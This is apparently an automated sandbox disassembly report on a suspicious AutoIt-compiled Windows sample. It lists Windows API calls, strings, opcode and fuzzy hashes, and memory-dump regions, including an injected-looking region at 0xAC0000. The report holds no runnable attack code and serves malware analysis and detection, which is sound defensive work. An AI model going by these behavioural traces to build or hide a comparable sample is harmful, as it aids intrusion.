                                                                                        • Instruction ID: 1255aefd97d2c2f79ef1b1b79539b188ad8bec3e1c684f5f10fb073d5288a5a3
                                                                                        • Opcode Fuzzy Hash: 3007ae169ef8b9d8c61beb8ea063371979b6b354134e23f449e077085ff78b4f
                                                                                        • Instruction Fuzzy Hash: 7F621E34A14658DBEB24CFA4C850BDEB372EF58300F1091A9D10DEB395E7769E81CB69
                                                                                        APIs
                                                                                          • Part of subcall function 00404DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,004C52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00404E0F
                                                                                        • _free.LIBCMT ref: 0043E263
                                                                                        • _free.LIBCMT ref: 0043E2AA
                                                                                          • Part of subcall function 00406A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00406BAD
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: _free$CurrentDirectoryLibraryLoad
                                                                                        • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                                        • API String ID: 2861923089-1757145024
                                                                                        • Opcode ID: f413f2e7c434e9e03e9f16404d873b79b547acec2a3101a96d959fb79dc57132
                                                                                        • Instruction ID: bc1048028433ed9b22f3ef3a1c1c6008be5ef254c57e4e777beaa03c5b85f979
                                                                                        • Opcode Fuzzy Hash: f413f2e7c434e9e03e9f16404d873b79b547acec2a3101a96d959fb79dc57132
                                                                                        • Instruction Fuzzy Hash: 0D916E71901229AFCF04EFA6C8419EEB7B4FF08314F10446FE815AB2E1DB78A955CB59
                                                                                        APIs
                                                                                        • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,004035A1,SwapMouseButtons,00000004,?), ref: 004035D4
                                                                                        • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,004035A1,SwapMouseButtons,00000004,?,?,?,?,00402754), ref: 004035F5
                                                                                        • RegCloseKey.KERNEL32(00000000,?,?,004035A1,SwapMouseButtons,00000004,?,?,?,?,00402754), ref: 00403617
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseOpenQueryValue
                                                                                        • String ID: Control Panel\Mouse
                                                                                        • API String ID: 3677997916-824357125
                                                                                        • Opcode ID: fddb709fe4a1b7e3bb6eda9662e0779279b58f522ad42de317fca39f37a0c6b5
                                                                                        • Instruction ID: b1ff216ba3ee978410a1c1c06e663b0c2c98cd46aaa17f39490786bf8a1b1252
                                                                                        • Opcode Fuzzy Hash: fddb709fe4a1b7e3bb6eda9662e0779279b58f522ad42de317fca39f37a0c6b5
                                                                                        • Instruction Fuzzy Hash: 84114871510208BFDB20CF64DC409AFBBBCEF45741F10486AE805E7250D6729E449768
                                                                                        APIs
                                                                                          • Part of subcall function 00404EE5: _fseek.LIBCMT ref: 00404EFD
                                                                                          • Part of subcall function 00469734: _wcscmp.LIBCMT ref: 00469824
                                                                                          • Part of subcall function 00469734: _wcscmp.LIBCMT ref: 00469837
                                                                                        • _free.LIBCMT ref: 004696A2
                                                                                        • _free.LIBCMT ref: 004696A9
                                                                                        • _free.LIBCMT ref: 00469714
                                                                                          • Part of subcall function 00422D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00429A24), ref: 00422D69
                                                                                          • Part of subcall function 00422D55: GetLastError.KERNEL32(00000000,?,00429A24), ref: 00422D7B
                                                                                        • _free.LIBCMT ref: 0046971C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                                        • String ID:
                                                                                        • API String ID: 1552873950-0
                                                                                        • Opcode ID: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                                                        • Instruction ID: ca2eec8eb8578c2366e6fbf42eaf411172dd757ca1b938988fe54b4571807f9b
                                                                                        • Opcode Fuzzy Hash: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                                                        • Instruction Fuzzy Hash: 88515EB1904219ABDF249F65DC81A9EBB79EF88304F1044AEF209A3241DB755E90CF59
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                                        • String ID:
                                                                                        • API String ID: 2782032738-0
                                                                                        • Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                                                        • Instruction ID: 7e2b6cc7ad03bd9c76499a1e37937a2f988b0f8539bc111f38111bac958280d8
                                                                                        • Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                                                        • Instruction Fuzzy Hash: 9341D434B006659BDB189F69E88096F7BA5EFC2364B50813FE82587640DB78DD418B48
                                                                                        APIs
                                                                                        • SetFilePointerEx.KERNEL32 ref: 00ACB2BA
                                                                                        • WriteFile.KERNEL32(?,?,00000004,?,00000000), ref: 00ACB2E0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2311032865.0000000000AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AC0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ac0000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$PointerWrite
                                                                                        • String ID:
                                                                                        • API String ID: 539440098-0
                                                                                        • Opcode ID: ce007f26b5e7be0c3ab7b88fb6babf04beb87d51989558971e0926f189d85a1b
                                                                                        • Instruction ID: 40eff5da78d80b060f990eceed6f14c5ce3bf45e74ea179d51d3926f44110996
                                                                                        • Opcode Fuzzy Hash: ce007f26b5e7be0c3ab7b88fb6babf04beb87d51989558971e0926f189d85a1b
                                                                                        • Instruction Fuzzy Hash: 3131A57052C380AED7118B258817F6FBFE46F92714F4A894DE4D49B691D3B7880887B3
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: _memmove
                                                                                        • String ID: AU3!P/I$EA06
                                                                                        • API String ID: 4104443479-1914660620
                                                                                        • Opcode ID: 16f5da041bfe5336b7d6228a32569345bac751845b8ec38fb7b22f9adfc250c8
                                                                                        • Instruction ID: ff6ab1fe0fa27ea81cbcababf34b5742e04188ff143208347500ec0318cc5285
                                                                                        • Opcode Fuzzy Hash: 16f5da041bfe5336b7d6228a32569345bac751845b8ec38fb7b22f9adfc250c8
                                                                                        • Instruction Fuzzy Hash: F1418AB1A0415867DB219B6498517BF7BA19FC5304F28407BEE82BB3C2D63C5D4583AA
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 0043EA39
                                                                                        • GetOpenFileNameW.COMDLG32(?), ref: 0043EA83
                                                                                          • Part of subcall function 00404750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00404743,?,?,004037AE,?), ref: 00404770
                                                                                          • Part of subcall function 00420791: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 004207B0
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: Name$Path$FileFullLongOpen_memset
                                                                                        • String ID: X
                                                                                        • API String ID: 3777226403-3081909835
                                                                                        • Opcode ID: f7a2dfced1c7fac4da1122c6cfde17308801e93c3a8658db5658365851755d62
                                                                                        • Instruction ID: baa1e7331fae4d359aac7897d23b5e8ce5a65ce190648e6f88e75d23560a4c0c
                                                                                        • Opcode Fuzzy Hash: f7a2dfced1c7fac4da1122c6cfde17308801e93c3a8658db5658365851755d62
                                                                                        • Instruction Fuzzy Hash: 4421A471A102589BCB41DF95D845BDE7BF8AF49314F00806FE508B7281DBB85989CFAA
                                                                                        APIs
                                                                                        • GetTempPathW.KERNEL32(00000104,?), ref: 004698F8
                                                                                        • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 0046990F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: Temp$FileNamePath
                                                                                        • String ID: aut
                                                                                        • API String ID: 3285503233-3010740371
                                                                                        • Opcode ID: d3e801ab242beb6fec4b4f89e1aaff04be832202f3ef9fc21f6b566375e79959
                                                                                        • Instruction ID: d76eb4abf93f0e171a782776cb2de2514a1bc3ee8d101bd4a6c1c3d5b9ef8161
                                                                                        • Opcode Fuzzy Hash: d3e801ab242beb6fec4b4f89e1aaff04be832202f3ef9fc21f6b566375e79959
                                                                                        • Instruction Fuzzy Hash: D0D05E7954030DABDB50ABA0DC0EFDA773CE704700F0006F5BA54D10A1EAB1A5988BA9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e563156e91e36691d5f4fcac2aaf6be647dac8c86d34431775506fe1d7328f76
                                                                                        • Instruction ID: 208f182f3c9136cc863dec11eab3d0960db0a10b8073f2b3425ab1c058278d8f
                                                                                        • Opcode Fuzzy Hash: e563156e91e36691d5f4fcac2aaf6be647dac8c86d34431775506fe1d7328f76
                                                                                        • Instruction Fuzzy Hash: 8AF13A716083019FC714DF29C480A6ABBE5FF88318F54892EF8999B392D734E945CF86
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2311032865.0000000000AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AC0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ac0000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: ComputerName
                                                                                        • String ID:
                                                                                        • API String ID: 3545744682-0
                                                                                        • Opcode ID: 38ab21e8312f4446f1e4d74e8157d3637eace4b432985e0ad559e60a3ebdf03d
                                                                                        • Instruction ID: 41f9f2bfa702bb88a6f95ba033227efd5f8dcc5b9b62450780ab29f3ac805d40
                                                                                        • Opcode Fuzzy Hash: 38ab21e8312f4446f1e4d74e8157d3637eace4b432985e0ad559e60a3ebdf03d
                                                                                        • Instruction Fuzzy Hash: 1521F534A4D3C47BEA3657178C86FBD3A35AF61710F884886F589561D2E9A82C08CB63
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00404370
                                                                                        • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00404415
                                                                                        • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00404432
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: IconNotifyShell_$_memset
                                                                                        • String ID:
                                                                                        • API String ID: 1505330794-0
                                                                                        • Opcode ID: 55e578eaf81f1082cb721cb8179a93cbba9ea3621e04278649df261dfa9eaab8
                                                                                        • Instruction ID: 448a70bf35e4549ae47872dc9eb977fea889799f7ce089bf6dae1479d4278b9a
                                                                                        • Opcode Fuzzy Hash: 55e578eaf81f1082cb721cb8179a93cbba9ea3621e04278649df261dfa9eaab8
                                                                                        • Instruction Fuzzy Hash: 4E3184B05047019FD760DF24D884A9BBBF8FB98308F00093FEA9A92391D7746944CB5A
                                                                                        APIs
                                                                                        • __FF_MSGBANNER.LIBCMT ref: 00425733
                                                                                          • Part of subcall function 0042A16B: __NMSG_WRITE.LIBCMT ref: 0042A192
                                                                                          • Part of subcall function 0042A16B: __NMSG_WRITE.LIBCMT ref: 0042A19C
                                                                                        • __NMSG_WRITE.LIBCMT ref: 0042573A
                                                                                          • Part of subcall function 0042A1C8: GetModuleFileNameW.KERNEL32(00000000,004C33BA,00000104,00000000,00000001,00000000), ref: 0042A25A
                                                                                          • Part of subcall function 0042A1C8: ___crtMessageBoxW.LIBCMT ref: 0042A308
                                                                                          • Part of subcall function 0042309F: ___crtCorExitProcess.LIBCMT ref: 004230A5
                                                                                          • Part of subcall function 0042309F: ExitProcess.KERNEL32 ref: 004230AE
                                                                                          • Part of subcall function 00428B28: __getptd_noexit.LIBCMT ref: 00428B28
                                                                                        • RtlAllocateHeap.NTDLL(00CB0000,00000000,00000001,?,00000000,00000001,?,00420DD3,?,00000000,%I,?,00409E8C,?,?,?), ref: 0042575F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                                        • String ID:
                                                                                        • API String ID: 1372826849-0
                                                                                        APIs
                                                                                        • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00469548,?,?,?,?,?,00000004), ref: 004698BB
                                                                                        • SetFileTime.KERNEL32(00000000,?,00000000,?,?,00469548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 004698D1
                                                                                        • CloseHandle.KERNEL32(00000000,?,00469548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 004698D8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$CloseCreateHandleTime
                                                                                        • String ID:
                                                                                        • API String ID: 3397143404-0
                                                                                        APIs
                                                                                        • _free.LIBCMT ref: 00468D1B
                                                                                          • Part of subcall function 00422D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00429A24), ref: 00422D69
                                                                                          • Part of subcall function 00422D55: GetLastError.KERNEL32(00000000,?,00429A24), ref: 00422D7B
                                                                                        • _free.LIBCMT ref: 00468D2C
                                                                                        • _free.LIBCMT ref: 00468D3E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                        • String ID:
                                                                                        • API String ID: 776569668-0
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: CALL
                                                                                        • API String ID: 0-4196123274
                                                                                        APIs
                                                                                        • CharLowerBuffW.USER32(?,?), ref: 00465B93
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: BuffCharLower
                                                                                        • String ID:
                                                                                        • API String ID: 2358735015-0
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: _memmove
                                                                                        • String ID:
                                                                                        • API String ID: 4104443479-0
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: _memmove
                                                                                        • String ID:
                                                                                        • API String ID: 4104443479-0
                                                                                        APIs
                                                                                        • CreateThread.KERNEL32(00000000,00000000,00AC55C0,?,00000000,00000000), ref: 00AC5A51
                                                                                        • RtlExitUserThread.NTDLL(00000000), ref: 00AC5B11
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2311032865.0000000000AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AC0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ac0000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: Thread$CreateExitUser
                                                                                        • String ID:
                                                                                        • API String ID: 4108186749-0
                                                                                        APIs
                                                                                        • IsThemeActive.UXTHEME ref: 00404834
                                                                                          • Part of subcall function 0042336C: __lock.LIBCMT ref: 00423372
                                                                                          • Part of subcall function 0042336C: DecodePointer.KERNEL32(00000001,?,00404849,00457C74), ref: 0042337E
                                                                                          • Part of subcall function 0042336C: EncodePointer.KERNEL32(?,?,00404849,00457C74), ref: 00423389
                                                                                          • Part of subcall function 004048FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00404915
                                                                                          • Part of subcall function 004048FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0040492A
                                                                                          • Part of subcall function 00403B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00403B68
                                                                                          • Part of subcall function 00403B3A: IsDebuggerPresent.KERNEL32 ref: 00403B7A
                                                                                          • Part of subcall function 00403B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,004C52F8,004C52E0,?,?), ref: 00403BEB
                                                                                          • Part of subcall function 00403B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00403C6F
                                                                                        • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00404874
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                                                        • String ID:
                                                                                        • API String ID: 1438897964-0
                                                                                        APIs
                                                                                          • Part of subcall function 0042571C: __FF_MSGBANNER.LIBCMT ref: 00425733
                                                                                          • Part of subcall function 0042571C: __NMSG_WRITE.LIBCMT ref: 0042573A
                                                                                          • Part of subcall function 0042571C: RtlAllocateHeap.NTDLL(00CB0000,00000000,00000001,?,00000000,00000001,?,00420DD3,?,00000000,%I,?,00409E8C,?,?,?), ref: 0042575F
                                                                                        • std::exception::exception.LIBCMT ref: 00420DEC
                                                                                        • __CxxThrowException@8.LIBCMT ref: 00420E01
                                                                                          • Part of subcall function 0042859B: RaiseException.KERNEL32(?,?,00000000,004B9E78,?,00000001,?,?,?,00420E06,00000000,004B9E78,00409E8C,00000001), ref: 004285F0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                        • String ID:
                                                                                        • API String ID: 3902256705-0
                                                                                        • Opcode ID: 9167050c2dc4b0825c829503e55bc25cac2c16fe4eec559eca79d4812c62c980
                                                                                        • Instruction ID: 7ce0db18d3e86308d2e94e4ef4c1f65fcbea9f9514d772724804ad69f7891851
